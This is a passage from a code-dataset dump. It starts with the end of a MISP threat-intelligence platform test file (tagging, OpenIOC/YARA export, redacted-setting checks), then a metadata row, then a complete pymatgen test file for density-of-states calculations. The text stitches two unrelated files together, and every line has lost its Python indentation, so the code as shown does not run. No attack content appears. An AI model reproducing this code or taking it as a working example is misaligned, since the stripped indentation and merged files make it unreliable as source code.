event.add_attribute('attachment', value='testfile.py', data=BytesIO(f.read()))
event = check_response(self.admin_misp_connector.add_event(event))
attribute_uuids = [attribute.uuid for attribute in event.attributes if attribute.type == 'attachment']
self.assertEqual(1, len(attribute_uuids))
check_response(self.admin_misp_connector.tag(attribute_uuids[0], 'generic_tag_test'))
check_response(self.admin_misp_connector.delete_event(event))
def test_add_duplicate_tags(self):
event = create_simple_event()
event = check_response(self.admin_misp_connector.add_event(event))
# Just first tag should be added
check_response(self.admin_misp_connector.tag(event.uuid, 'generic_tag_test', local=True))
check_response(self.admin_misp_connector.tag(event.uuid, 'generic_tag_test', local=False))
fetched_event = check_response(self.admin_misp_connector.get_event(event))
self.assertEqual(1, len(fetched_event.tags), fetched_event.tags)
self.assertTrue(fetched_event.tags[0].local, fetched_event.tags[0])
def test_export(self):
event = create_simple_event()
event.add_attribute("ip-src", "1.2.4.5", to_ids=True)
event = check_response(self.admin_misp_connector.add_event(event))
result = self._search({'returnFormat': "openioc", 'eventid': event.id, "published": [0, 1]})
ET.fromstring(result) # check if result is valid XML
self.assertTrue("1.2.4.5" in result, result)
result = self._search({'returnFormat': "yara", 'eventid': event.id, "published": [0, 1]})
self.assertTrue("1.2.4.5" in result, result)
self.assertTrue("GENERATED" in result, result)
self.assertTrue("AS-IS" in result, result)
result = self._search({'returnFormat': "yara-json", 'eventid': event.id, "published": [0, 1]})
self.assertIn("generated", result)
self.assertEqual(len(result["generated"]), 1, result)
self.assertIn("as-is", result)
check_response(self.admin_misp_connector.delete_event(event))
def test_event_report_empty_name(self):
event = create_simple_event()
new_event_report = MISPEventReport()
new_event_report.name = ""
new_event_report.content = "# Example report markdown"
new_event_report.distribution = 5 # Inherit
try:
event = check_response(self.user_misp_connector.add_event(event))
new_event_report = self.user_misp_connector.add_event_report(event.id, new_event_report)
self.assertIn("errors", new_event_report)
finally:
self.user_misp_connector.delete_event(event)
def test_new_audit(self):
with MISPSetting(self.admin_misp_connector, {"MISP.log_new_audit": True}):
event = create_simple_event()
event = check_response(self.user_misp_connector.add_event(event))
self.user_misp_connector.delete_event(event)
def test_csp_report(self):
response = self.admin_misp_connector._prepare_request('POST', 'servers/cspReport', data={
"csp-report": {
"test": "test",
}
})
self.assertEqual(204, response.status_code)
def test_redacted_setting(self):
response = self.admin_misp_connector.get_server_setting('Security.salt')
self.assertEqual(403, response["errors"][0])
response = self.admin_misp_connector._prepare_request('GET', 'servers/serverSettingsEdit/Security.salt')
response = self.admin_misp_connector._check_json_response(response)
self.assertEqual(403, response["errors"][0])
def _search(self, query: dict):
response = self.admin_misp_connector._prepare_request('POST', 'events/restSearch', data=query)
response = self.admin_misp_connector._check_response(response)
check_response(response)
return response
if __name__ == '__main__':
unittest.main()
|
SteveClement/MISP
|
tests/testlive_comprehensive_local.py
|
Python
|
agpl-3.0
| 29,299
|
[
"Amber"
] |
909a4595687b467301d760323de34c4847288548fb33316c3f45d89bdd97a1a4
|
# coding: utf-8
# Copyright (c) Pymatgen Development Team.
# Distributed under the terms of the MIT License.
import json
import os
import unittest
import numpy as np
from monty.serialization import loadfn
from pymatgen.core.structure import Structure
from pymatgen.core.periodic_table import Element
from pymatgen.electronic_structure.core import Orbital, OrbitalType, Spin
from pymatgen.electronic_structure.dos import (
DOS,
CompleteDos,
FermiDos,
LobsterCompleteDos,
)
from pymatgen.util.testing import PymatgenTest
class DosTest(unittest.TestCase):
def setUp(self):
with open(os.path.join(PymatgenTest.TEST_FILES_DIR, "complete_dos.json"), "r") as f:
self.dos = CompleteDos.from_dict(json.load(f))
def test_get_gap(self):
dos = self.dos
self.assertAlmostEqual(dos.get_gap(), 2.0589, 4)
self.assertEqual(len(dos.energies), 301)
self.assertAlmostEqual(
dos.get_interpolated_gap(tol=0.001, abs_tol=False, spin=None)[0],
2.16815942458015,
7,
)
self.assertAlmostEqual(dos.get_cbm_vbm(), (3.8729, 1.8140000000000001))
self.assertAlmostEqual(dos.get_interpolated_value(9.9)[Spin.up], 1.744588888888891, 7)
self.assertAlmostEqual(dos.get_interpolated_value(9.9)[Spin.down], 1.756888888888886, 7)
self.assertRaises(ValueError, dos.get_interpolated_value, 1000)
def test_get_smeared_densities(self):
dos = self.dos
smeared = dos.get_smeared_densities(0.2)
dens = dos.densities
for spin in Spin:
self.assertAlmostEqual(sum(dens[spin]), sum(smeared[spin]))
def test_as_dict(self):
dos_dict = self.dos.as_dict()
self.assertIsInstance(dos_dict["energies"], list)
self.assertIsInstance(dos_dict["energies"][0], float)
self.assertNotIsInstance(dos_dict["energies"][0], np.float64)
self.assertIsInstance(dos_dict["densities"]["1"], list)
self.assertIsInstance(dos_dict["densities"]["1"][0], float)
self.assertNotIsInstance(dos_dict["densities"]["1"][0], np.float64)
class FermiDosTest(unittest.TestCase):
def setUp(self):
with open(os.path.join(PymatgenTest.TEST_FILES_DIR, "complete_dos.json"), "r") as f:
self.dos = CompleteDos.from_dict(json.load(f))
self.dos = FermiDos(self.dos)
def test_doping_fermi(self):
T = 300
fermi0 = self.dos.efermi
frange = [fermi0 - 0.5, fermi0, fermi0 + 2.0, fermi0 + 2.2]
dopings = [self.dos.get_doping(fermi_level=f, temperature=T) for f in frange]
ref_dopings = [3.48077e21, 1.9235e18, -2.6909e16, -4.8723e19]
for i, c_ref in enumerate(ref_dopings):
self.assertLessEqual(abs(dopings[i] / c_ref - 1.0), 0.01)
calc_fermis = [self.dos.get_fermi(concentration=c, temperature=T) for c in ref_dopings]
for j, f_ref in enumerate(frange):
self.assertAlmostEqual(calc_fermis[j], f_ref, 4)
sci_dos = FermiDos(self.dos, bandgap=3.0)
self.assertEqual(sci_dos.get_gap(), 3.0)
old_cbm, old_vbm = self.dos.get_cbm_vbm()
old_gap = old_cbm - old_vbm
new_cbm, new_vbm = sci_dos.get_cbm_vbm()
self.assertAlmostEqual(new_cbm - old_cbm, (3.0 - old_gap) / 2.0)
self.assertAlmostEqual(old_vbm - new_vbm, (3.0 - old_gap) / 2.0)
for i, c_ref in enumerate(ref_dopings):
if c_ref < 0:
self.assertAlmostEqual(sci_dos.get_fermi(c_ref, temperature=T) - frange[i], 0.47, places=2)
else:
self.assertAlmostEqual(sci_dos.get_fermi(c_ref, temperature=T) - frange[i], -0.47, places=2)
self.assertAlmostEqual(sci_dos.get_fermi_interextrapolated(-1e26, 300), 7.5108, 4)
self.assertAlmostEqual(sci_dos.get_fermi_interextrapolated(1e26, 300), -1.4182, 4)
self.assertAlmostEqual(sci_dos.get_fermi_interextrapolated(0.0, 300), 2.5226, 4)
def test_as_dict(self):
dos_dict = self.dos.as_dict()
self.assertIsInstance(dos_dict["energies"], list)
self.assertIsInstance(dos_dict["energies"][0], float)
self.assertNotIsInstance(dos_dict["energies"][0], np.float64)
self.assertIsInstance(dos_dict["densities"]["1"], list)
self.assertIsInstance(dos_dict["densities"]["1"][0], float)
self.assertNotIsInstance(dos_dict["densities"]["1"][0], np.float64)
class CompleteDosTest(unittest.TestCase):
def setUp(self):
with open(os.path.join(PymatgenTest.TEST_FILES_DIR, "complete_dos.json"), "r") as f:
self.dos = CompleteDos.from_dict(json.load(f))
def test_get_gap(self):
dos = self.dos
self.assertAlmostEqual(dos.get_gap(), 2.0589, 4, "Wrong gap from dos!")
self.assertEqual(len(dos.energies), 301)
self.assertAlmostEqual(
dos.get_interpolated_gap(tol=0.001, abs_tol=False, spin=None)[0],
2.16815942458015,
7,
)
spd_dos = dos.get_spd_dos()
self.assertEqual(len(spd_dos), 3)
el_dos = dos.get_element_dos()
self.assertEqual(len(el_dos), 4)
sum_spd = spd_dos[OrbitalType.s] + spd_dos[OrbitalType.p] + spd_dos[OrbitalType.d]
sum_element = None
for pdos in el_dos.values():
if sum_element is None:
sum_element = pdos
else:
sum_element += pdos
# The sums of the SPD or the element doses should be the same.
self.assertTrue((abs(sum_spd.energies - sum_element.energies) < 0.0001).all())
self.assertTrue((abs(sum_spd.densities[Spin.up] - sum_element.densities[Spin.up]) < 0.0001).all())
self.assertTrue((abs(sum_spd.densities[Spin.down] - sum_element.densities[Spin.down]) < 0.0001).all())
site = dos.structure[0]
self.assertIsNotNone(dos.get_site_dos(site))
self.assertAlmostEqual(sum(dos.get_site_dos(site).get_densities(Spin.up)), 2.0391)
self.assertAlmostEqual(sum(dos.get_site_dos(site).get_densities(Spin.down)), 2.0331999999999995)
self.assertIsNotNone(dos.get_site_orbital_dos(site, Orbital.s))
egt2g = dos.get_site_t2g_eg_resolved_dos(site)
self.assertAlmostEqual(sum(egt2g["e_g"].get_densities(Spin.up)), 0.0)
self.assertAlmostEqual(sum(egt2g["t2g"].get_densities(Spin.up)), 0.0)
egt2g = dos.get_site_t2g_eg_resolved_dos(dos.structure[4])
self.assertAlmostEqual(sum(egt2g["e_g"].get_densities(Spin.up)), 15.004399999999997)
self.assertAlmostEqual(sum(egt2g["t2g"].get_densities(Spin.up)), 22.910399999999999)
self.assertAlmostEqual(dos.get_cbm_vbm(), (3.8729, 1.8140000000000001))
self.assertAlmostEqual(dos.get_interpolated_value(9.9)[Spin.up], 1.744588888888891, 7)
self.assertAlmostEqual(dos.get_interpolated_value(9.9)[Spin.down], 1.756888888888886, 7)
self.assertRaises(ValueError, dos.get_interpolated_value, 1000)
def test_to_from_dict(self):
d = self.dos.as_dict()
dos = CompleteDos.from_dict(d)
el_dos = dos.get_element_dos()
self.assertEqual(len(el_dos), 4)
spd_dos = dos.get_spd_dos()
sum_spd = spd_dos[OrbitalType.s] + spd_dos[OrbitalType.p] + spd_dos[OrbitalType.d]
sum_element = None
for pdos in el_dos.values():
if sum_element is None:
sum_element = pdos
else:
sum_element += pdos
# The sums of the SPD or the element doses should be the same.
self.assertTrue((abs(sum_spd.energies - sum_element.energies) < 0.0001).all())
def test_str(self):
self.assertIsNotNone(str(self.dos))
def test_as_dict(self):
dos_dict = self.dos.as_dict()
self.assertIsInstance(dos_dict["energies"], list)
self.assertIsInstance(dos_dict["energies"][0], float)
self.assertNotIsInstance(dos_dict["energies"][0], np.float64)
self.assertIsInstance(dos_dict["densities"]["1"], list)
self.assertIsInstance(dos_dict["densities"]["1"][0], float)
self.assertNotIsInstance(dos_dict["densities"]["1"][0], np.float64)
class DOSTest(PymatgenTest):
def setUp(self):
with open(os.path.join(PymatgenTest.TEST_FILES_DIR, "complete_dos.json"), "r") as f:
d = json.load(f)
y = list(zip(d["densities"]["1"], d["densities"]["-1"]))
self.dos = DOS(d["energies"], y, d["efermi"])
def test_get_gap(self):
dos = self.dos
self.assertAlmostEqual(dos.get_gap(), 2.0589, 4)
self.assertEqual(len(dos.x), 301)
self.assertAlmostEqual(
dos.get_interpolated_gap(tol=0.001, abs_tol=False, spin=None)[0],
2.16815942458015,
7,
)
self.assertArrayAlmostEqual(dos.get_cbm_vbm(), (3.8729, 1.8140000000000001))
self.assertAlmostEqual(dos.get_interpolated_value(9.9)[0], 1.744588888888891, 7)
self.assertAlmostEqual(dos.get_interpolated_value(9.9)[1], 1.756888888888886, 7)
self.assertRaises(ValueError, dos.get_interpolated_value, 1000)
self.assertArrayAlmostEqual(dos.get_cbm_vbm(spin=Spin.up), (3.8729, 1.2992999999999999))
self.assertArrayAlmostEqual(dos.get_cbm_vbm(spin=Spin.down), (4.645, 1.8140000000000001))
class SpinPolarizationTest(unittest.TestCase):
def test_spin_polarization(self):
dos_path = os.path.join(PymatgenTest.TEST_FILES_DIR, "dos_spin_polarization_mp-865805.json")
dos = loadfn(dos_path)
self.assertAlmostEqual(dos.spin_polarization, 0.6460514663341762)
class LobsterCompleteDosTest(unittest.TestCase):
def setUp(self):
with open(os.path.join(PymatgenTest.TEST_FILES_DIR, "LobsterCompleteDos_spin.json"), "r") as f:
data_spin = json.load(f)
self.LobsterCompleteDOS_spin = LobsterCompleteDos.from_dict(data_spin)
with open(os.path.join(PymatgenTest.TEST_FILES_DIR, "LobsterCompleteDos_nonspin.json"), "r") as f:
data_nonspin = json.load(f)
self.LobsterCompleteDOS_nonspin = LobsterCompleteDos.from_dict(data_nonspin)
with open(os.path.join(PymatgenTest.TEST_FILES_DIR, "structure_KF.json"), "r") as f:
data_structure = json.load(f)
self.structure = Structure.from_dict(data_structure)
with open(os.path.join(PymatgenTest.TEST_FILES_DIR, "LobsterCompleteDos_MnO.json"), "r") as f:
data_MnO = json.load(f)
self.LobsterCompleteDOS_MnO = LobsterCompleteDos.from_dict(data_MnO)
with open(os.path.join(PymatgenTest.TEST_FILES_DIR, "LobsterCompleteDos_MnO_nonspin.json"), "r") as f:
data_MnO_nonspin = json.load(f)
self.LobsterCompleteDOS_MnO_nonspin = LobsterCompleteDos.from_dict(data_MnO_nonspin)
with open(os.path.join(PymatgenTest.TEST_FILES_DIR, "structure_MnO.json"), "r") as f:
data_MnO = json.load(f)
self.structure_MnO = Structure.from_dict(data_MnO)
def test_get_site_orbital_dos(self):
# with spin polarization
energies_spin = [-11.25000, -7.50000, -3.75000, 0.00000, 3.75000, 7.50000]
fermi = 0.0
PDOS_F_2s_up = [0.00000, 0.00159, 0.00000, 0.00011, 0.00000, 0.00069]
PDOS_F_2s_down = [0.00000, 0.00159, 0.00000, 0.00011, 0.00000, 0.00069]
PDOS_F_2py_up = [0.00000, 0.00160, 0.00000, 0.25801, 0.00000, 0.00029]
PDOS_F_2py_down = [0.00000, 0.00161, 0.00000, 0.25819, 0.00000, 0.00029]
PDOS_F_2pz_up = [0.00000, 0.00161, 0.00000, 0.25823, 0.00000, 0.00029]
PDOS_F_2pz_down = [0.00000, 0.00160, 0.00000, 0.25795, 0.00000, 0.00029]
PDOS_F_2px_up = [0.00000, 0.00160, 0.00000, 0.25805, 0.00000, 0.00029]
PDOS_F_2px_down = [0.00000, 0.00161, 0.00000, 0.25814, 0.00000, 0.00029]
self.assertListEqual(
self.LobsterCompleteDOS_spin.get_site_orbital_dos(site=self.structure[0], orbital="2s").energies.tolist(),
energies_spin,
)
self.assertAlmostEqual(
self.LobsterCompleteDOS_spin.get_site_orbital_dos(site=self.structure[0], orbital="2s").efermi,
fermi,
)
self.assertListEqual(
self.LobsterCompleteDOS_spin.get_site_orbital_dos(site=self.structure[0], orbital="2s")
.densities[Spin.up]
.tolist(),
PDOS_F_2s_up,
)
self.assertListEqual(
self.LobsterCompleteDOS_spin.get_site_orbital_dos(site=self.structure[0], orbital="2s")
.densities[Spin.down]
.tolist(),
PDOS_F_2s_down,
)
self.assertListEqual(
self.LobsterCompleteDOS_spin.get_site_orbital_dos(site=self.structure[0], orbital="2p_z").energies.tolist(),
energies_spin,
)
self.assertAlmostEqual(
self.LobsterCompleteDOS_spin.get_site_orbital_dos(site=self.structure[0], orbital="2p_z").efermi,
fermi,
)
self.assertListEqual(
self.LobsterCompleteDOS_spin.get_site_orbital_dos(site=self.structure[0], orbital="2p_y")
.densities[Spin.up]
.tolist(),
PDOS_F_2py_up,
)
self.assertListEqual(
self.LobsterCompleteDOS_spin.get_site_orbital_dos(site=self.structure[0], orbital="2p_y")
.densities[Spin.down]
.tolist(),
PDOS_F_2py_down,
)
self.assertListEqual(
self.LobsterCompleteDOS_spin.get_site_orbital_dos(site=self.structure[0], orbital="2p_y").energies.tolist(),
energies_spin,
)
self.assertAlmostEqual(
self.LobsterCompleteDOS_spin.get_site_orbital_dos(site=self.structure[0], orbital="2p_y").efermi,
fermi,
)
self.assertListEqual(
self.LobsterCompleteDOS_spin.get_site_orbital_dos(site=self.structure[0], orbital="2p_z")
.densities[Spin.up]
.tolist(),
PDOS_F_2pz_up,
)
self.assertListEqual(
self.LobsterCompleteDOS_spin.get_site_orbital_dos(site=self.structure[0], orbital="2p_z")
.densities[Spin.down]
.tolist(),
PDOS_F_2pz_down,
)
self.assertAlmostEqual(
self.LobsterCompleteDOS_spin.get_site_orbital_dos(site=self.structure[0], orbital="2p_z").efermi,
fermi,
)
self.assertListEqual(
self.LobsterCompleteDOS_spin.get_site_orbital_dos(site=self.structure[0], orbital="2p_x").energies.tolist(),
energies_spin,
)
self.assertListEqual(
self.LobsterCompleteDOS_spin.get_site_orbital_dos(site=self.structure[0], orbital="2p_x")
.densities[Spin.up]
.tolist(),
PDOS_F_2px_up,
)
self.assertListEqual(
self.LobsterCompleteDOS_spin.get_site_orbital_dos(site=self.structure[0], orbital="2p_x")
.densities[Spin.down]
.tolist(),
PDOS_F_2px_down,
)
self.assertAlmostEqual(
self.LobsterCompleteDOS_spin.get_site_orbital_dos(site=self.structure[0], orbital="2p_x").efermi,
fermi,
)
# without spin polarization
energies_nonspin = [-11.25000, -7.50000, -3.75000, 0.00000, 3.75000, 7.50000]
PDOS_F_2s = [0.00000, 0.00320, 0.00000, 0.00017, 0.00000, 0.00060]
PDOS_F_2py = [0.00000, 0.00322, 0.00000, 0.51635, 0.00000, 0.00037]
PDOS_F_2pz = [0.00000, 0.00322, 0.00000, 0.51636, 0.00000, 0.00037]
PDOS_F_2px = [0.00000, 0.00322, 0.00000, 0.51634, 0.00000, 0.00037]
self.assertListEqual(
self.LobsterCompleteDOS_nonspin.get_site_orbital_dos(
site=self.structure[0], orbital="2s"
).energies.tolist(),
energies_nonspin,
)
self.assertAlmostEqual(
self.LobsterCompleteDOS_nonspin.get_site_orbital_dos(site=self.structure[0], orbital="2s").efermi,
fermi,
)
self.assertListEqual(
self.LobsterCompleteDOS_nonspin.get_site_orbital_dos(site=self.structure[0], orbital="2s")
.densities[Spin.up]
.tolist(),
PDOS_F_2s,
)
self.assertListEqual(
self.LobsterCompleteDOS_nonspin.get_site_orbital_dos(
site=self.structure[0], orbital="2p_y"
).energies.tolist(),
energies_nonspin,
)
self.assertAlmostEqual(
self.LobsterCompleteDOS_nonspin.get_site_orbital_dos(site=self.structure[0], orbital="2p_y").efermi,
fermi,
)
self.assertListEqual(
self.LobsterCompleteDOS_nonspin.get_site_orbital_dos(site=self.structure[0], orbital="2p_y")
.densities[Spin.up]
.tolist(),
PDOS_F_2py,
)
self.assertListEqual(
self.LobsterCompleteDOS_nonspin.get_site_orbital_dos(
site=self.structure[0], orbital="2p_z"
).energies.tolist(),
energies_nonspin,
)
self.assertAlmostEqual(
self.LobsterCompleteDOS_nonspin.get_site_orbital_dos(site=self.structure[0], orbital="2p_z").efermi,
fermi,
)
self.assertListEqual(
self.LobsterCompleteDOS_nonspin.get_site_orbital_dos(site=self.structure[0], orbital="2p_z")
.densities[Spin.up]
.tolist(),
PDOS_F_2pz,
)
self.assertListEqual(
self.LobsterCompleteDOS_nonspin.get_site_orbital_dos(
site=self.structure[0], orbital="2p_x"
).energies.tolist(),
energies_nonspin,
)
self.assertAlmostEqual(
self.LobsterCompleteDOS_nonspin.get_site_orbital_dos(site=self.structure[0], orbital="2p_x").efermi,
fermi,
)
self.assertListEqual(
self.LobsterCompleteDOS_nonspin.get_site_orbital_dos(site=self.structure[0], orbital="2p_x")
.densities[Spin.up]
.tolist(),
PDOS_F_2px,
)
def test_get_site_t2g_eg_resolved_dos(self):
# with spin polarization
energies = [-11.25000, -7.50000, -3.75000, 0.00000, 3.75000, 7.50000]
efermi = 0.0
PDOS_Mn_3dxy_up = [0.00000, 0.00001, 0.10301, 0.16070, 0.00070, 0.00060]
PDOS_Mn_3dxy_down = [0.00000, 0.00000, 0.00380, 0.00996, 0.03012, 0.21890]
PDOS_Mn_3dyz_up = [0.00000, 0.00001, 0.10301, 0.16070, 0.00070, 0.00060]
PDOS_Mn_3dyz_down = [0.00000, 0.00000, 0.00380, 0.00996, 0.03012, 0.21890]
PDOS_Mn_3dz2_up = [0.00000, 0.00001, 0.09608, 0.16941, 0.00028, 0.00028]
PDOS_Mn_3dz2_down = [0.00000, 0.00000, 0.00433, 0.00539, 0.06000, 0.19427]
PDOS_Mn_3dxz_up = [0.00000, 0.00001, 0.09746, 0.16767, 0.00036, 0.00034]
PDOS_Mn_3dxz_down = [0.00000, 0.00000, 0.00422, 0.00630, 0.05402, 0.19919]
PDOS_Mn_3dx2_up = [0.00000, 0.00001, 0.09330, 0.17289, 0.00011, 0.00015]
PDOS_Mn_3dx2_down = [0.00000, 0.00000, 0.00454, 0.00356, 0.07195, 0.18442]
PDOS_Mn_eg_up = (np.array(PDOS_Mn_3dx2_up) + np.array(PDOS_Mn_3dz2_up)).tolist()
PDOS_Mn_eg_down = (np.array(PDOS_Mn_3dx2_down) + np.array(PDOS_Mn_3dz2_down)).tolist()
PDOS_Mn_t2g_up = (np.array(PDOS_Mn_3dxy_up) + np.array(PDOS_Mn_3dxz_up) + np.array(PDOS_Mn_3dyz_up)).tolist()
PDOS_Mn_t2g_down = (
np.array(PDOS_Mn_3dxy_down) + np.array(PDOS_Mn_3dxz_down) + np.array(PDOS_Mn_3dyz_down)
).tolist()
for iel, el in enumerate(
self.LobsterCompleteDOS_MnO.get_site_t2g_eg_resolved_dos(self.structure_MnO[1])["e_g"]
.densities[Spin.up]
.tolist()
):
self.assertAlmostEqual(el, PDOS_Mn_eg_up[iel])
for iel, el in enumerate(
self.LobsterCompleteDOS_MnO.get_site_t2g_eg_resolved_dos(self.structure_MnO[1])["e_g"]
.densities[Spin.down]
.tolist()
):
self.assertAlmostEqual(el, PDOS_Mn_eg_down[iel])
for iel, el in enumerate(
self.LobsterCompleteDOS_MnO.get_site_t2g_eg_resolved_dos(self.structure_MnO[1])["t2g"]
.densities[Spin.up]
.tolist()
):
self.assertAlmostEqual(el, PDOS_Mn_t2g_up[iel])
for iel, el in enumerate(
self.LobsterCompleteDOS_MnO.get_site_t2g_eg_resolved_dos(self.structure_MnO[1])["t2g"]
.densities[Spin.down]
.tolist()
):
self.assertAlmostEqual(el, PDOS_Mn_t2g_down[iel])
self.assertListEqual(
energies,
self.LobsterCompleteDOS_MnO.get_site_t2g_eg_resolved_dos(self.structure_MnO[1])["e_g"].energies.tolist(),
)
self.assertListEqual(
energies,
self.LobsterCompleteDOS_MnO.get_site_t2g_eg_resolved_dos(self.structure_MnO[1])["t2g"].energies.tolist(),
)
self.assertEqual(
efermi,
self.LobsterCompleteDOS_MnO.get_site_t2g_eg_resolved_dos(self.structure_MnO[1])["e_g"].efermi,
)
self.assertEqual(
efermi,
self.LobsterCompleteDOS_MnO.get_site_t2g_eg_resolved_dos(self.structure_MnO[1])["t2g"].efermi,
)
# without spin polarization
energies_nonspin = [-11.25000, -7.50000, -3.75000, 0.00000, 3.75000, 7.50000]
PDOS_Mn_3dxy = [0.00000, 0.00000, 0.02032, 0.16094, 0.33659, 0.01291]
PDOS_Mn_3dyz = [0.00000, 0.00000, 0.02032, 0.16126, 0.33628, 0.01290]
PDOS_Mn_3dz2 = [0.00000, 0.00000, 0.02591, 0.31460, 0.18658, 0.00509]
PDOS_Mn_3dxz = [0.00000, 0.00000, 0.02484, 0.28501, 0.21541, 0.00663]
PDOS_Mn_3dx2 = [0.00000, 0.00000, 0.02817, 0.37594, 0.12669, 0.00194]
PDOS_Mn_eg = (np.array(PDOS_Mn_3dx2) + np.array(PDOS_Mn_3dz2)).tolist()
PDOS_Mn_t2g = (np.array(PDOS_Mn_3dxy) + np.array(PDOS_Mn_3dxz) + np.array(PDOS_Mn_3dyz)).tolist()
for iel, el in enumerate(
self.LobsterCompleteDOS_MnO_nonspin.get_site_t2g_eg_resolved_dos(self.structure_MnO[1])["e_g"]
.densities[Spin.up]
.tolist()
):
self.assertAlmostEqual(el, PDOS_Mn_eg[iel])
for iel, el in enumerate(
self.LobsterCompleteDOS_MnO_nonspin.get_site_t2g_eg_resolved_dos(self.structure_MnO[1])["t2g"]
.densities[Spin.up]
.tolist()
):
self.assertAlmostEqual(el, PDOS_Mn_t2g[iel])
self.assertListEqual(
energies_nonspin,
self.LobsterCompleteDOS_MnO_nonspin.get_site_t2g_eg_resolved_dos(self.structure_MnO[1])[
"e_g"
].energies.tolist(),
)
self.assertListEqual(
energies_nonspin,
self.LobsterCompleteDOS_MnO_nonspin.get_site_t2g_eg_resolved_dos(self.structure_MnO[1])[
"t2g"
].energies.tolist(),
)
self.assertEqual(
efermi,
self.LobsterCompleteDOS_MnO_nonspin.get_site_t2g_eg_resolved_dos(self.structure_MnO[1])["e_g"].efermi,
)
self.assertEqual(
efermi,
self.LobsterCompleteDOS_MnO_nonspin.get_site_t2g_eg_resolved_dos(self.structure_MnO[1])["t2g"].efermi,
)
def test_get_spd_dos(self):
# with spin polarization
energies_spin = [-11.25000, -7.50000, -3.75000, 0.00000, 3.75000, 7.50000]
fermi = 0.0
PDOS_F_2s_up = [0.00000, 0.00159, 0.00000, 0.00011, 0.00000, 0.00069]
PDOS_F_2s_down = [0.00000, 0.00159, 0.00000, 0.00011, 0.00000, 0.00069]
PDOS_F_2py_up = [0.00000, 0.00160, 0.00000, 0.25801, 0.00000, 0.00029]
PDOS_F_2py_down = [0.00000, 0.00161, 0.00000, 0.25819, 0.00000, 0.00029]
PDOS_F_2pz_up = [0.00000, 0.00161, 0.00000, 0.25823, 0.00000, 0.00029]
PDOS_F_2pz_down = [0.00000, 0.00160, 0.00000, 0.25795, 0.00000, 0.00029]
PDOS_F_2px_up = [0.00000, 0.00160, 0.00000, 0.25805, 0.00000, 0.00029]
PDOS_F_2px_down = [0.00000, 0.00161, 0.00000, 0.25814, 0.00000, 0.00029]
PDOS_K_3s_up = [0.00000, 0.00000, 0.00000, 0.00008, 0.00000, 0.00007]
PDOS_K_3s_down = [0.00000, 0.00000, 0.00000, 0.00008, 0.00000, 0.00007]
PDOS_K_4s_up = [0.00000, 0.00018, 0.00000, 0.02035, 0.00000, 0.02411]
PDOS_K_4s_down = [0.00000, 0.00018, 0.00000, 0.02036, 0.00000, 0.02420]
PDOS_K_3py_up = [0.00000, 0.26447, 0.00000, 0.00172, 0.00000, 0.00000]
PDOS_K_3py_down = [0.00000, 0.26446, 0.00000, 0.00172, 0.00000, 0.00000]
PDOS_K_3pz_up = [0.00000, 0.26446, 0.00000, 0.00172, 0.00000, 0.00000]
PDOS_K_3pz_down = [0.00000, 0.26447, 0.00000, 0.00172, 0.00000, 0.00000]
PDOS_K_3px_up = [0.00000, 0.26447, 0.00000, 0.00172, 0.00000, 0.00000]
PDOS_K_3px_down = [0.00000, 0.26446, 0.00000, 0.00172, 0.00000, 0.00000]
PDOS_s_up = (np.array(PDOS_F_2s_up) + np.array(PDOS_K_3s_up) + np.array(PDOS_K_4s_up)).tolist()
PDOS_s_down = (np.array(PDOS_F_2s_down) + np.array(PDOS_K_3s_down) + np.array(PDOS_K_4s_down)).tolist()
PDOS_p_up = (
np.array(PDOS_F_2py_up)
+ np.array(PDOS_F_2pz_up)
+ np.array(PDOS_F_2px_up)
+ np.array(PDOS_K_3py_up)
+ np.array(PDOS_K_3pz_up)
+ np.array(PDOS_K_3px_up)
).tolist()
PDOS_p_down = (
np.array(PDOS_F_2py_down)
+ np.array(PDOS_F_2pz_down)
+ np.array(PDOS_F_2px_down)
+ np.array(PDOS_K_3py_down)
+ np.array(PDOS_K_3pz_down)
+ np.array(PDOS_K_3px_down)
).tolist()
self.assertListEqual(
self.LobsterCompleteDOS_spin.get_spd_dos()[OrbitalType(0)].energies.tolist(),
energies_spin,
)
self.assertEqual(self.LobsterCompleteDOS_spin.get_spd_dos()[OrbitalType(0)].efermi, fermi)
for ilistel, listel in enumerate(
self.LobsterCompleteDOS_spin.get_spd_dos()[OrbitalType(0)].densities[Spin.up].tolist()
):
self.assertAlmostEqual(listel, PDOS_s_up[ilistel])
for ilistel, listel in enumerate(
self.LobsterCompleteDOS_spin.get_spd_dos()[OrbitalType(0)].densities[Spin.down].tolist()
):
self.assertAlmostEqual(listel, PDOS_s_down[ilistel])
for ilistel, listel in enumerate(
self.LobsterCompleteDOS_spin.get_spd_dos()[OrbitalType(1)].densities[Spin.up].tolist()
):
self.assertAlmostEqual(listel, PDOS_p_up[ilistel])
for ilistel, listel in enumerate(
self.LobsterCompleteDOS_spin.get_spd_dos()[OrbitalType(1)].densities[Spin.down].tolist()
):
self.assertAlmostEqual(listel, PDOS_p_down[ilistel])
# without spin polarization
energies_nonspin = [-11.25000, -7.50000, -3.75000, 0.00000, 3.75000, 7.50000]
PDOS_F_2s = [0.00000, 0.00320, 0.00000, 0.00017, 0.00000, 0.00060]
PDOS_F_2py = [0.00000, 0.00322, 0.00000, 0.51635, 0.00000, 0.00037]
PDOS_F_2pz = [0.00000, 0.00322, 0.00000, 0.51636, 0.00000, 0.00037]
PDOS_F_2px = [0.00000, 0.00322, 0.00000, 0.51634, 0.00000, 0.00037]
PDOS_K_3s = [0.00000, 0.00000, 0.00000, 0.00005, 0.00000, 0.00004]
PDOS_K_4s = [0.00000, 0.00040, 0.00000, 0.04039, 0.00000, 0.02241]
PDOS_K_3py = [0.00000, 0.52891, 0.00000, 0.00345, 0.00000, 0.00000]
PDOS_K_3pz = [0.00000, 0.52891, 0.00000, 0.00345, 0.00000, 0.00000]
PDOS_K_3px = [0.00000, 0.52891, 0.00000, 0.00345, 0.00000, 0.00000]
PDOS_s = (np.array(PDOS_F_2s) + np.array(PDOS_K_3s) + np.array(PDOS_K_4s)).tolist()
PDOS_p = (
np.array(PDOS_F_2py)
+ np.array(PDOS_F_2pz)
+ np.array(PDOS_F_2px)
+ np.array(PDOS_K_3py)
+ np.array(PDOS_K_3pz)
+ np.array(PDOS_K_3px)
).tolist()
self.assertListEqual(
self.LobsterCompleteDOS_nonspin.get_spd_dos()[OrbitalType(0)].energies.tolist(),
energies_nonspin,
)
for ilistel, listel in enumerate(
self.LobsterCompleteDOS_nonspin.get_spd_dos()[OrbitalType(0)].densities[Spin.up].tolist()
):
self.assertAlmostEqual(listel, PDOS_s[ilistel])
for ilistel, listel in enumerate(
self.LobsterCompleteDOS_nonspin.get_spd_dos()[OrbitalType(1)].densities[Spin.up].tolist()
):
self.assertAlmostEqual(listel, PDOS_p[ilistel])
